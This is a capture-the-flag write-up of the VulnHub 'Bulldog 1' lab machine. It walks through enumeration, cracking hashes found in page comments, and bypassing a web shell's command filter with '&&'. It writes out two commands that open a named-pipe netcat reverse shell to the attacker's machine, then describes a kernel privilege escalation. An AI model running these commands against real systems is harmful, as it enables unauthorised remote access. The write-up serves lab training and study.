Bulldog 1

Based on my enjoyment of Bulldog 2, the only logical choice for my second VulnHub challenge was Bulldog 1.

A quick nmap scan tells us that there’s a web sever running on ports 80 and 8080. DirBuster finds several interesting leads with content at /dev and also /admin.

The /dev page contains some info about “company” changes, including a list of technical points of contact. It also contains a link to a web shell which is only accessible by authenticated users…we’ll come back to that.

A quick view of the source code behind the page shows some commented out hashes…very sly.

John the Ripper has an easy time breaking nick’s hash.

The /admin URL brings us to a login form where we can enter nick’s credentials.

After authenticating we can then revisit the web shell referenced on the /dev page. While the commands permitted in the web shell are limited, you can circumvent that restriction to some extent by using the double ampersand to execute multiple commands. Still, however, simpler methods (Python reverse shell, NetCat with -e, etc) for reverse shells still error out with a “Server Error (500)”. The approach I found to be successful was the “backpipe” method that I used for much of my OSCP studies.

The two commands I used were:
pwd && mknod /tmp/backpipe p
pwd && /bin/sh 0</tmp/backpipe | nc 192.168.0.31 443 1>/tmp/backpipe

This creates a reverse shell back to my Kali machine. From there I can enumerate the bulldog server and look for low hanging fruit to escalate my privileges. We find that server is running a linux kernel version 4.4.0. The top result for “4.4.0” on exploit-db.com brings us to Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) – Local Privilege Escalation

We can download this file and compile on our attacking machine, retrieve it from the bulldog VM with wget, and run the executable. And voila, rooted!